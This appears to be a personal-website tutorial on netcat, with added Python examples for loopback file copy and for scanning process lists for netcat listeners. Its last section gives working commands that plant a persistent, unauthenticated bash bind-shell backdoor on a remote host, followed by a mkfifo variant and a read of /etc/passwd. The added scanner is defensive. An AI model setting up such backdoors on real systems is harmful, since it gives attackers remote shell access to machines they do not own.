Netcat (or nc) - open the door
Brett Lee
====================================================
If you are reading this, you have probably connected to an SMTP or HTTP port
using 'telnet' at least once in your life. To review, 'telnet' establishes a TCP
connection to a port that accepts TCP connections, and you then type the protocol's
commands by hand:
[root@linux ~]# telnet localhost
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[root@linux ~]#
** Nothing running on port 23. Try port 80.
** Note: there are TWO CRs (i.e. an empty line) after the "GET / ..." request line.
[root@linux ~]# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
GET / HTTP 1.1
HTTP/1.1 200 OK
Date: Thu, 13 Nov 2008 21:40:47 GMT
Server: Apache/1.3.23 (Unix) (Red-Hat/Linux) mod_python/2.7.6 Python/1.5.2
mod_ssl/2.8.7 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.1.2 mod_perl/1.26
mod_throttle/3.1.2
Last-Modified: Wed, 12 Nov 2008 16:03:16 GMT
ETag: "77762-2852-4b041ac4"
Accept-Ranges: bytes
Content-Length: 10322
Connection: close
Content-Type: text/html
<html>
<head>
...
** Aha, we got the web page. How about SMTP:
[root@linux ~]# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
220 linux.domain.local ESMTP Sendmail 8.11.6/8.11.6; Thu, 13 Nov 2008 14:43:51 -0700
mail from: brett@yahoo.com
250 2.1.0 brett@yahoo.com... Sender ok
rcpt to: root
250 2.1.5 root... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Here's your email...
.
^]
telnet> q
[root@linux ~]#
** Notice how the HTTP server gracefully closed the connection for us, whereas
the SMTP server required us to do a telnet escape (Ctrl-])? How nice. We'll
see more of that later...
Well, 'netcat' is like 'telnet' in that it lets you establish a TCP
connection. But 'telnet' can only talk TCP, not UDP; netcat can do both. By
default netcat uses TCP, but with an option you can send UDP datagrams instead.
Time for some 'netcat' examples:
Let's say that you want to copy a file from a Solaris system to a Linux system,
and for some reason you don't have scp, sftp, or any of those available.
1. First, on the Linux system you start up a 'netcat' listener:
Note: if you are a non-root user, you'll need to listen on a port
greater than 1024, as port 1024 and lower are restricted.
[root@linux ~]# nc -l -p 9000
2. Then, use 'netcat' on the sending system to write to the listener:
[root@solaris ~]# echo "Top Secret Data" | nc linux 9000
** Note that "netcat" was 'nc' on the Linux box and 'netcat' on Solaris.
** As an alternative to sending with netcat, you may be able to reach the
netcat listener by writing to the tcp device (a.k.a. BSD Portals):
[root@solaris ~]# echo "Top Secret Data" > /dev/tcp/linux/9000
3. Return to the listener and observe your output:
[root@linux ~]# nc -l -p 9000
Top Secret Data
** You'll need to send ^C to end the listener if you used 'netcat' to send;
if you used the Portal, it closes the connection for you. How nice.
4. This time, let's perform the "file copy" mentioned earlier:
[root@linux ~]# nc -l -p 9000 > topsecret.data
and on the other system:
[root@solaris ~]# cat topsecret.file | nc linux 9000
Ok, that's some basic stuff. If you like the idea of using Portals, or want
a more advanced method to copy both text and binary files, take a look at
the wcat.sh script in this directory.
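The file copy above, and the note about who closes the connection, done with plain sockets so you can see what netcat is doing underneath. This is an added example, not the author's script; the sample file is constructed, the listener binds to an OS-chosen loopback port instead of 9000, and the sender half-closes (sends FIN) after the file so the listener sees EOF rather than needing a ^C.

```python
import hashlib
import os
import socket
import tempfile
import threading

def receive_to_file(dest_path, bound, ready):
    """Like 'nc -l -p PORT > dest': accept one connection and write bytes until EOF."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
        srv.listen(1)
        bound.append(srv.getsockname()[1])  # tell the sender which port we got
        ready.set()
        conn, _ = srv.accept()
        with conn, open(dest_path, "wb") as out:
            while True:
                chunk = conn.recv(65536)
                if not chunk:               # peer closed its write side: copy complete
                    break
                out.write(chunk)

def send_file(port, src_path):
    """Like 'cat src | nc host PORT', but half-close afterwards instead of needing ^C."""
    with socket.create_connection(("127.0.0.1", port)) as s, open(src_path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)          # send FIN: the listener sees EOF and exits

def sha256_of(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def copy_over_tcp(src_path, dest_path):
    """Run listener and sender on loopback; return True if the copy is byte-identical."""
    bound, ready = [], threading.Event()
    t = threading.Thread(target=receive_to_file, args=(dest_path, bound, ready))
    t.start()
    ready.wait()
    send_file(bound[0], src_path)
    t.join()
    return sha256_of(src_path) == sha256_of(dest_path)

def demo():
    """Constructed input: a 300 KB file of random bytes (binary, not just text)."""
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "topsecret.file"), os.path.join(d, "topsecret.data")
    with open(src, "wb") as f:
        f.write(os.urandom(300_000))
    ok = copy_over_tcp(src, dst)
    return ok, os.path.getsize(dst)
```

Comparing checksums on both ends is the check the plain netcat copy lacks: netcat will happily write a truncated file if the sender is interrupted early.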
As one final 'netcat' example, we'll use wget.sh and netcat together to execute
commands on a remote system. Netcat is copied over to the system, and commands
can then be run on the 'netcat' system remotely, and without authorization. For this
example we will be running a different version of netcat (see below). Lastly,
we'll modify the example so that it establishes a persistent listener.
ON THE HOST YOU WILL BE CONNECTING TO:
======================================
[user1@secure1 ~]$ bash
[user1@secure1 ~]$ vi wget.sh
(add script code from this directory)
[user1@secure1 ~]$ chmod +x wget.sh
[user1@secure1 ~]$ ./wget.sh http://linux/netcat
Saving file to netcat...
[user1@secure1 ~]$ chmod +x netcat
[user1@secure1 ~]$ ./netcat -V
netcat (The GNU Netcat) 0.7.1
Copyright (C) 2002 - 2003 Giovanni Giacobbi
This program comes with NO WARRANTY, to the extent permitted by law.
You may redistribute copies of this program under the terms of
the GNU General Public License.
For more information about these matters, see the file named COPYING.
Original idea and design by Avian Research <hobbit@avian.org>,
Written by Giovanni Giacobbi <giovanni@giacobbi.net>.
[user1@secure1 ~]$ echo "./netcat -l -p 9000 -n --exec='/bin/bash; nohup ./backdoor &'" > backdoor
[user1@secure1 ~]$ chmod +x backdoor
[user1@secure1 ~]$ nohup ./backdoor &
AND FROM ANOTHER HOST:
=====================================
[root@solaris ~]# ./netcat secure1 9000
pwd
/tmp
^C[root@solaris ~]# ./netcat secure1 9000
cat /etc/passwd
...and you know what follows :)
Finally, in one of the references below, I found that you could create a backdoor
in a cleaner way using `mkfifo`:
[user1@secure1 ~]$ mkfifo backdoor
[user1@secure1 ~]$ nohup cat backdoor | /bin/bash | ./netcat -l -p 9000 > backdoor &
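From the defender's side, both listeners above leave the same footprint in a process listing: a netcat binary with a listen option, with or without an exec option (the mkfifo variant has none, which is why it is "cleaner"). The scanner below is an added example, not from the page or from any netcat project; it runs over a constructed 'ps -eo pid,user,args' sample, and the set of exec-style options it knows (-e/--exec as on this page, -c/--sh-exec as ncat spells them) is an assumption to extend for whatever variants are in your fleet.

```python
import re
import shlex

NETCAT_BINS = {"nc", "netcat", "ncat", "nc.traditional", "nc.openbsd"}
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}   # -e/--exec as on this page; -c/--sh-exec is ncat's

def netcat_finding(args):
    """Return (severity, reason) for one command line, or None if it is not a netcat listener."""
    try:
        toks = shlex.split(args)
    except ValueError:              # unbalanced quote in a truncated ps line
        toks = args.split()
    idx = next((i for i, t in enumerate(toks) if t.rsplit("/", 1)[-1] in NETCAT_BINS), None)
    if idx is None:
        return None
    opts = toks[idx + 1:]
    # '-l'/'--listen' on its own, or bundled in a short-option cluster such as -lp or -nvlp
    listening = any(o == "--listen" or re.fullmatch(r"-[A-Za-z]*l[A-Za-z]*", o) for o in opts)
    if not listening:
        return None
    execs = any(o.split("=", 1)[0] in EXEC_FLAGS or re.fullmatch(r"-[A-Za-z]*[ec][A-Za-z]*", o)
                for o in opts)
    if execs:
        return ("high", "netcat listener that spawns a program (the --exec bind shell above)")
    return ("medium", "netcat listener with no exec flag: check what is piped into it (mkfifo pattern above)")

def scan_ps(ps_output):
    """Parse 'PID USER COMMAND' lines (header first); return [(pid, user, severity, reason)]."""
    findings = []
    for line in ps_output.strip().splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, args = parts
        hit = netcat_finding(args)
        if hit:
            findings.append((int(pid), user) + hit)
    return findings

# Constructed sample in 'ps -eo pid,user,args' layout; the netcat lines mirror this page's commands.
SAMPLE_PS = """\
  PID USER     COMMAND
 1203 root     /usr/sbin/sshd -D
 2231 user1    ./netcat -l -p 9000 -n --exec=/bin/bash; nohup ./backdoor &
 2241 user1    /bin/bash
 2242 user1    ./netcat -l -p 9000
 2300 user1    nc linux 9000
 2310 root     ncat -lvp 4444 -c /bin/sh
"""
```

The outbound client (pid 2300, the file-copy sender) is deliberately not flagged; pair this with a listening-socket check (ss -ltnp) if you want the port and the owning pid rather than argv alone.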
Additional References:
------------------------------
http://www.madirish.net/?article=184
http://netsecure.alcpress.com/netcat/
http://www.gnucitizen.org/blog/reverse-shell-with-bash/
In an effort to provide a service of value to the open source community, I've put together this website containing many of my notes and references.
This website is not authoritative and it is certainly not without errors; it is a work in progress.
In addition to my contributions you will also find the work of others. Where the work is not mine, I have tried to indicate that, and to reference the source of the work: by citing the original author, retaining the authors' name and license wherever present, or by placing the work in a suitably named URL containing /external/ in the path. If you find any work here that should not be publicly available, please send me a note and it will be removed.
As for my contributions, you are free to use any of *MY* notes or code from this website unless specifically instructed otherwise.
Brett Lee, Ph.D., President & CEO
Everything Penguin, Inc.